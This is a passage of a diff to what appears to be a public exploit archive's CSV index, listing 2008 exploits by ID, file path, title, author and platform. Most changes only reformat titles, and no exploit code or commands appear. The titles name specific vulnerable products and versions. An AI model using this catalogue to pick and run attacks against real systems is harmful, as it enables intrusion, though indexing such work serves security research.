Blog 0.1 (RFI/SQL/XSS) Multiple Remote Vulnerabilities",2008-07-22,Unohope,php,webapps,0 -6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 +6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0 @@ -5826,7 +5826,7 @@ id,file,description,date,author,platform,type,port 6216,platforms/windows/dos/6216.html,"Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC",2008-08-10,"Guido Landi",windows,dos,0 6217,platforms/windows/remote/6217.pl,"BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit",2008-08-10,LiquidWorm,windows,remote,0 6218,platforms/multiple/dos/6218.txt,"Sun xVM VirtualBox < 1.6.4 Privilege Escalation Vulnerability PoC",2008-08-10,"Core Security",multiple,dos,0 -6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 Arbitrary Variable Overwriting Vulnerability",2008-08-10,"GulfTech Security",php,webapps,0 +6219,platforms/php/webapps/6219.txt,"e107 <= 0.7.11 - Arbitrary Variable Overwriting Vulnerability",2008-08-10,"GulfTech Security",php,webapps,0 6220,platforms/windows/remote/6220.html,"Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit",2008-08-10,"Guido Landi",windows,remote,0 6221,platforms/php/webapps/6221.txt,"Vacation Rental Script 3.0 (id) Remote SQL Injection Vulnerability",2008-08-10,CraCkEr,php,webapps,0 6223,platforms/php/webapps/6223.php,"Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit",2008-08-10,irk4z,php,webapps,0 @@ -5856,9 +5856,9 @@ id,file,description,date,author,platform,type,port 6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 Local Heap Overflow DOS / PoC",2008-08-16,j0rgan,windows,dos,0 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability",2008-08-17,NuclearHaxor,php,webapps,0 -6255,platforms/php/webapps/6255.txt,"phpArcadeScript v4 (cat) Remote SQL Injection Vulnerability",2008-08-17,"Hussin X",php,webapps,0 +6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) Remote SQL Injection Vulnerability",2008-08-17,"Hussin X",php,webapps,0 6256,platforms/windows/remote/6256.pl,"FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)",2008-08-17,"Guido Landi",windows,remote,0 -6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client Remote Format String PoC",2008-08-17,securfrog,windows,dos,0 +6257,platforms/windows/dos/6257.pl,"WS_FTP Home/Professional FTP Client Remote Format String PoC",2008-08-17,securfrog,windows,dos,0 6258,platforms/php/webapps/6258.txt,"PHPBasket (product.php pro_id) SQL Injection Vulnerability",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload Vulnerability",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 Multiple Remote SQL Injection Vulnerabilities",2008-08-18,cOndemned,php,webapps,0 @@ -5871,7 +5871,7 @@ id,file,description,date,author,platform,type,port 6276,platforms/php/webapps/6276.txt,"Banner Management Script (tr.php id) Remote SQL Injection Vulnerability",2008-08-19,S.W.A.T.,php,webapps,0 6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 Remote SQL Injection Vulnerability",2008-08-19,"Hussin X",php,webapps,0 6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object <= 3.2.30 ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 -6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit",2008-08-20,Mr.SQL,php,webapps,0 +6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - XSS / Remote Blind SQL Injection Exploit",2008-08-20,Mr.SQL,php,webapps,0 6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability",2008-08-20,e.wiZz!,php,webapps,0 6281,platforms/php/webapps/6281.pl,"webEdition CMS (we_objectID) Blind SQL Injection Exploit",2008-08-20,Lidloses_Auge,php,webapps,0 6284,platforms/php/webapps/6284.txt,"CustomCMS 4.0 (CCMS) print.php Remote SQL Injection Vulnerability",2008-08-21,~!Dok_tOR!~,php,webapps,0 @@ -5898,8 +5898,8 @@ id,file,description,date,author,platform,type,port 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit",2008-08-26,mAXzA,php,webapps,0 6312,platforms/php/webapps/6312.txt,"K-Rate (SQL/XSS) Multiple Remote Vulnerabilities",2008-08-26,Corwin,php,webapps,0 -6313,platforms/php/webapps/6313.txt,"CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 -6314,platforms/php/webapps/6314.txt,"Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulnerability",2008-08-26,SirGod,php,webapps,0 +6313,platforms/php/webapps/6313.txt,"CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 +6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (admins.php) Admin Data Disclosure Vulnerability",2008-08-26,SirGod,php,webapps,0 6315,platforms/php/webapps/6315.txt,"iFdate <= 2.0.3 Remote SQL Injection Vulnerability",2008-08-26,~!Dok_tOR!~,php,webapps,0 6316,platforms/php/webapps/6316.php,"MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2)",2008-08-26,c411k,php,webapps,0 6317,platforms/windows/remote/6317.html,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit",2008-08-26,Koshi,windows,remote,0 @@ -5934,9 +5934,9 @@ id,file,description,date,author,platform,type,port 6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 (id) Remote SQL Injection Vulnerability",2008-09-02,"Hussin X",php,webapps,0 6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability",2008-09-02,"Hussin X",php,webapps,0 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME (comment.php artid) SQL Injection Vulnerability",2008-09-02,"security fears team",php,webapps,0 -6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability",2008-09-02,InjEctOr5,php,webapps,0 +6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability",2008-09-02,InjEctOr5,php,webapps,0 6352,platforms/php/webapps/6352.txt,"CS-Cart <= 1.3.5 (Auth Bypass) SQL Injection Vulnerability",2008-09-02,"GulfTech Security",php,webapps,0 -6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability",2008-09-03,"Rishi Narang",windows,dos,0 +6353,platforms/windows/dos/6353.txt,"Google Chrome Browser 0.2.149.27 - DoS Vulnerability",2008-09-03,"Rishi Narang",windows,dos,0 6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) Remote SQL Injection Vulnerability",2008-09-03,InjEctOr5,php,webapps,0 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 @@ -6032,7 +6032,7 @@ id,file,description,date,author,platform,type,port 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 Arbitrary Database Backup Vulnerability",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 Insecure Cookie Handling Vulnerability",2008-09-14,Stack,php,webapps,0 6458,platforms/windows/dos/6458.c,"The Personal FTP Server 6.0f RETR Denial of Service Exploit",2008-09-14,Shinnok,windows,dos,0 -6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) Remote Denial of Service Vulnerability",2008-09-14,wins.mallow,hardware,dos,0 +6459,platforms/hardware/dos/6459.txt,"Nokia e90/n82 (s60v3) - Remote Denial of Service Vulnerability",2008-09-14,wins.mallow,hardware,dos,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite Remote SQL Injection Vulnerabilities",2008-09-14,~!Dok_tOR!~,php,webapps,0 6461,platforms/php/webapps/6461.txt,"Cpanel <= 11.x (Fantastico) LFI Vulnerability (sec bypass)",2008-09-14,joker_1,php,webapps,0 6462,platforms/php/webapps/6462.pl,"CzarNews <= 1.20 (Cookie) Remote SQL Injection Exploit",2008-09-15,StAkeR,php,webapps,0 @@ -6061,7 +6061,7 @@ id,file,description,date,author,platform,type,port 6487,platforms/php/webapps/6487.txt,"CYASK 3.x (collect.php neturl) Local File Disclosure Vulnerability",2008-09-18,xy7,php,webapps,0 6488,platforms/php/webapps/6488.txt,"Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability",2008-09-18,sarbot511,php,webapps,0 6489,platforms/php/webapps/6489.txt,"ProActive CMS (template) Local File Inclusion Vulnerability",2008-09-18,r45c4l,php,webapps,0 -6490,platforms/php/webapps/6490.txt,"AssetMan v2.5-b SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 +6490,platforms/php/webapps/6490.txt,"AssetMan 2.5-b - SQL Injection using Session Fixation Attack",2008-09-18,"Neo Anderson",php,webapps,0 6491,platforms/windows/remote/6491.html,"NuMedia Soft NMS DVD Burning SDK Activex (NMSDVDX.dll) Exploit",2008-09-19,Nine:Situations:Group,windows,remote,0 6492,platforms/php/webapps/6492.php,"Pluck 4.5.3 (update.php) Remote File Corruption Exploit",2008-09-19,Nine:Situations:Group,php,webapps,0 6493,platforms/linux/dos/6493.pl,"fhttpd 0.4.2 un64() Remote Denial of Service Exploit",2008-09-19,"Jeremy Brown",linux,dos,0 @@ -6077,7 +6077,7 @@ id,file,description,date,author,platform,type,port 6503,platforms/php/webapps/6503.txt,"Plaincart 1.1.2 (p) Remote SQL Injection Vulnerability",2008-09-20,r45c4l,php,webapps,0 6504,platforms/php/webapps/6504.txt,"Oceandir <= 2.9 (show_vote.php id) Remote SQL Injection Vulnerability",2008-09-20,"JEEN HACKER TEAM",php,webapps,0 6505,platforms/php/webapps/6505.txt,"jPORTAL 2 (humor.php id) Remote SQL Injection Vulnerability",2008-09-20,r45c4l,php,webapps,0 -6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 v1.3 Remote Directory Traversal Vulnerability",2008-09-21,"Luigi Auriemma",windows,remote,0 +6506,platforms/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Remote Directory Traversal Vulnerability",2008-09-21,"Luigi Auriemma",windows,remote,0 6507,platforms/php/webapps/6507.php,"Invision Power Board <= 2.3.5 Remote SQL Injection Exploit",2008-09-21,waraxe,php,webapps,0 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 Remote SQL Injection Vulnerability",2008-09-21,0x90,php,webapps,0 6509,platforms/cgi/webapps/6509.txt,"TWiki <= 4.2.2 (action) Remote Code Execution Vulnerability",2008-09-21,webDEViL,cgi,webapps,0 @@ -6101,7 +6101,7 @@ id,file,description,date,author,platform,type,port 6527,platforms/php/webapps/6527.txt,"BuzzyWall <= 1.3.1 (search.php search) SQL Injection Vulnerability",2008-09-22,~!Dok_tOR!~,php,webapps,0 6528,platforms/php/webapps/6528.txt,"WCMS 1.0b (news_detail.asp id) Remote SQL Injection Vulnerability",2008-09-22,"CWH Underground",php,webapps,0 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P (comments.php) Blind SQL Injection Exploit",2008-09-22,Stack,php,webapps,0 -6530,platforms/php/webapps/6530.txt,"OpenElec <= v3.01 (form.php obj) Local File Inclusion Vulnerability",2008-09-22,dun,php,webapps,0 +6530,platforms/php/webapps/6530.txt,"OpenElec <= 3.01- (form.php obj) Local File Inclusion Vulnerability",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog <= 0.9.8 Insecure Cookie Handling Vulnerability",2008-09-22,Pepelux,php,webapps,0 6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 6533,platforms/php/webapps/6533.txt,"basebuilder <= 2.0.1 (main.inc.php) Remote File Inclusion Vulnerability",2008-09-22,dun,php,webapps,0 @@ -6211,7 +6211,7 @@ id,file,description,date,author,platform,type,port 6640,platforms/php/webapps/6640.pl,"ADN Forum <= 1.0b Blind SQL Injection Exploit",2008-10-01,StAkeR,php,webapps,0 6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability",2008-10-01,JosS,php,webapps,0 6642,platforms/php/webapps/6642.txt,"BMForum 5.6 (tagname) Remote SQL Injection Vulnerability",2008-10-01,~!Dok_tOR!~,php,webapps,0 -6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k v3.3 Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 +6643,platforms/php/webapps/6643.txt,"Discussion Forums 2k 3.3 - Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 6644,platforms/php/webapps/6644.txt,"Noname CMS 1.0 Multiple SQL Injection Vulnerabilities",2008-10-01,~!Dok_tOR!~,php,webapps,0 6645,platforms/php/webapps/6645.txt,"Crux Gallery <= 1.32 (index.php theme) Local File Inclusion Vulnerability",2008-10-01,StAkeR,php,webapps,0 6646,platforms/php/webapps/6646.php,"phpScheduleIt <= 1.2.10 (reserve.php) Remote Code Execution Exploit",2008-10-01,EgiX,php,webapps,0 @@ -6251,7 +6251,7 @@ id,file,description,date,author,platform,type,port 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability",2008-10-05,boom3rang,php,webapps,0 6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel (INFO_RAID_ID) SQL Injection",2008-10-05,boom3rang,php,webapps,0 6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability",2008-10-05,boom3rang,php,webapps,0 -6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln",2008-10-05,boom3rang,php,webapps,0 +6684,platforms/php/webapps/6684.txt,"PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln",2008-10-05,boom3rang,php,webapps,0 6685,platforms/php/webapps/6685.txt,"asiCMS alpha 0.208 Multiple Remote File Inclusion Vulnerabilities",2008-10-06,NoGe,php,webapps,0 6686,platforms/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 Directory Traversal Vulnerability",2008-10-06,"Brad Antoniewicz",windows,remote,0 6687,platforms/php/webapps/6687.pl,"Yerba SACphp <= 6.3 (mod) Local File Inclusion Exploit",2008-10-06,Pepelux,php,webapps,0 @@ -6295,14 +6295,14 @@ id,file,description,date,author,platform,type,port 6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser (array sort) Silent Crash Vulnerability",2008-10-10,ikki,hardware,dos,0 6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host (cat_id) SQL Injection Vulnerability",2008-10-10,BeyazKurt,php,webapps,0 6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0 -6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 +6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0 6732,platforms/windows/dos/6732.txt,"MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (LFD/CE) Multiple Remote Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 (index.php cat) SQL Injection Vulnerability",2008-10-12,Hakxer,php,webapps,0 -6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 +6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0 6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 Insecure Cookie Handling / SQL Injection Vuln",2008-10-12,Pepelux,php,webapps,0 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 (index.php) Local File Download Vulnerability",2008-10-12,JosS,php,webapps,0 @@ -6356,7 +6356,7 @@ id,file,description,date,author,platform,type,port 6788,platforms/php/webapps/6788.txt,"yappa-ng <= 2.3.3-beta0 (album) Local File Inclusion Vulnerability",2008-10-19,Vrs-hCk,php,webapps,0 6789,platforms/php/webapps/6789.pl,"Vivvo CMS <= 3.4 Multiple Vulnerabilities Destroyer Exploit",2008-10-19,Xianur0,php,webapps,0 6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 (itemID) Blind SQL Injection Exploit",2008-10-20,Five-Three-Nine,php,webapps,0 -6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit",2008-10-19,girex,php,webapps,0 +6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection Exploit",2008-10-19,girex,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla Component ds-syndicate (feed_id) SQL Injection Vulnerability",2008-10-20,boom3rang,php,webapps,0 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module Remote BOF Exploit",2008-10-20,InTeL,windows,remote,0 6795,platforms/php/webapps/6795.txt,"XOOPS Module makale Remote SQL Injection Vulnerability",2008-10-20,EcHoLL,php,webapps,0 @@ -6411,7 +6411,7 @@ id,file,description,date,author,platform,type,port 6845,platforms/cgi/webapps/6845.txt,"Ads Pro (dhtml.pl page) Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 (padmin) Local File Inclusion Vulnerability",2008-10-27,Vrs-hCk,php,webapps,0 6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue Remote SQL Injection Vulnerability",2008-10-27,BugReport.IR,php,webapps,0 -6848,platforms/php/webapps/6848.txt,"TlAds v1 Remote Insecure Cookie Handling Vulnerability",2008-10-27,x0r,php,webapps,0 +6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling Vulnerability",2008-10-27,x0r,php,webapps,0 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles (id) SQL Injection Vulnerability",2008-10-27,boom3rang,php,webapps,0 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 (langage) Local File Inclusion Vulnerability",2008-10-27,x0r,php,webapps,0 6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit",2008-10-27,gat3way,linux,local,0 @@ -6428,7 +6428,7 @@ id,file,description,date,author,platform,type,port 6862,platforms/php/webapps/6862.txt,"H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 Remote Denial of Service Exploit",2008-10-29,"Jeremy Brown",windows,dos,0 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability",2008-10-29,GoLd_M,cgi,webapps,0 -6865,platforms/php/webapps/6865.txt,"e107 Plugin fm pro v1 (FD/Upload/DT) Multiple Remote Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 +6865,platforms/php/webapps/6865.txt,"e107 Plugin FM Pro 1- (FD/Upload/DT) Multiple Remote Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop <= 1.1 Remote Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6867,platforms/php/webapps/6867.pl,"Wordpress Plugin e-Commerce <= 3.4 Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard <= 1.0.1 Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 @@ -6484,7 +6484,7 @@ id,file,description,date,author,platform,type,port 6919,platforms/php/webapps/6919.txt,"SFS EZ Career (content.php topic) SQL Injection Vulnerability",2008-10-31,Stack,php,webapps,0 6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites (topsite.php ts) Remote SQL Injection Vulnerability",2008-10-31,Stack,php,webapps,0 6921,platforms/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 writeFile() API Exploit (meta)",2008-11-01,"Kevin Finisterre",windows,remote,0 -6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore (where) Remote SQL Injection Vulnerability",2008-11-01,ZoRLu,php,webapps,0 +6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore (where) Remote SQL Injection Vulnerability",2008-11-01,ZoRLu,php,webapps,0 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site (directory.php cat) SQL Injection Vulnerability",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 @@ -6522,7 +6522,7 @@ id,file,description,date,author,platform,type,port 6957,platforms/php/webapps/6957.txt,"NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities",2008-11-02,StAkeR,php,webapps,0 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop (prodshow.php) SQL Injection Vulnerability",2008-11-02,d3v1l,php,webapps,0 6960,platforms/php/webapps/6960.txt,"1st News (products.php id) Remote SQL Injection Vulnerability",2008-11-02,TR-ShaRk,php,webapps,0 -6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit",2008-11-02,n/a,php,webapps,0 +6961,platforms/php/webapps/6961.pl,"deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit",2008-11-02,n/a,php,webapps,0 6962,platforms/php/webapps/6962.txt,"BosDev BosClassifieds (cat_id) SQL Injection Vulnerability",2008-11-03,ZoRLu,php,webapps,0 6963,platforms/windows/remote/6963.html,"Chilkat Crypt Activex Arbitrary File Creation/Execution PoC",2008-11-03,shinnai,windows,remote,0 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 Insecure Cookie Handling Vulnerability",2008-11-03,Hakxer,php,webapps,0 @@ -6548,7 +6548,7 @@ id,file,description,date,author,platform,type,port 6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability",2008-11-04,Hakxer,php,webapps,0 6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop <= 1.02 (SQL Injection) Auth Bypass Vuln",2008-11-04,Hakxer,php,webapps,0 6987,platforms/php/webapps/6987.txt,"Simple Document Management System 1.1.4 SQL Injection Auth Bypass",2008-11-04,Yuri,php,webapps,0 -6988,platforms/php/webapps/6988.txt,"Tours Manager v1 (cityview.php cityid) SQL Injection Vulnerability",2008-11-04,G4N0K,php,webapps,0 +6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - (cityview.php cityid) SQL Injection Vulnerability",2008-11-04,G4N0K,php,webapps,0 6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card <= 1.02 (SQL Injection) Auth Bypass Vuln",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito includefile Local File Inclusion Vulnerabilities",2008-11-04,StAkeR,php,webapps,0 6991,platforms/php/webapps/6991.txt,"TR News <= 2.1 (login.php) Remote Login Bypass Exploit",2008-11-04,StAkeR,php,webapps,0 @@ -6611,7 +6611,7 @@ id,file,description,date,author,platform,type,port 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 (id) Remote SQL Injection Vulnerability",2008-11-07,"Hussin X",php,webapps,0 7051,platforms/windows/local/7051.pl,"VLC Media Player < 0.9.6 .RT Stack Buffer Overflow Exploit",2008-11-07,SkD,windows,local,0 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability",2008-11-07,TR-ShaRk,php,webapps,0 -7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability",2008-11-07,G4N0K,php,webapps,0 +7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection Vulnerability",2008-11-07,G4N0K,php,webapps,0 7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 (AKEProtect.sys) Privilege Escalation Exploit",2008-11-07,"NT Internals",windows,local,0 7055,platforms/hardware/remote/7055.txt,"SpeedStream 5200 Authentication Bypass Config Download Vulnerability",2008-11-07,hkm,hardware,remote,0 7056,platforms/windows/remote/7056.rb,"GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta)",2008-11-08,"Kevin Finisterre",windows,remote,0 @@ -6619,20 +6619,20 @@ id,file,description,date,author,platform,type,port 7058,platforms/php/webapps/7058.txt,"zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities",2008-11-08,ZoRLu,php,webapps,0 7059,platforms/php/webapps/7059.txt,"Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln",2008-11-08,BugReport.IR,php,webapps,0 7060,platforms/hardware/dos/7060.txt,"2WIRE DSL Router (xslt) Denial of Service Vulnerability",2008-11-08,hkm,hardware,dos,0 -7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 (Auth Bypass) SQL Injection Vuln",2008-11-08,d3b4g,php,webapps,0 +7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Auth Bypass) SQL Injection Vuln",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"ZEEJOBSITE 2.0 Remote File Upload Vulnerability",2008-11-08,ZoRLu,php,webapps,0 -7063,platforms/php/webapps/7063.txt,"V3 Chat - Profiles/Dating Script 3.0.2 Insecure Cookie Handling Vuln",2008-11-08,Stack,php,webapps,0 +7063,platforms/php/webapps/7063.txt,"V3 Chat - Profiles/Dating Script 3.0.2 - Insecure Cookie Handling Vuln",2008-11-08,Stack,php,webapps,0 7064,platforms/php/webapps/7064.pl,"Mambo Component n-form (form_id) Blind SQL Injection Exploit",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio <= 7.12.2 (css.php theme) Local File Inclusion Vulnerability",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 Auth Bypass Vulnerability",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate <= 1.4 (Auth Bypass) SQL Injection Vulnerability",2008-11-08,d3b4g,asp,webapps,0 7068,platforms/php/webapps/7068.txt,"Mole Group Airline Ticket Script (Auth Bypass) SQL Injection Vuln",2008-11-08,Cyber-Zone,php,webapps,0 -7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 Insecure Cookie Handling Vulnerability",2008-11-08,Cyber-Zone,php,webapps,0 +7069,platforms/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling Vulnerability",2008-11-08,Cyber-Zone,php,webapps,0 7070,platforms/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 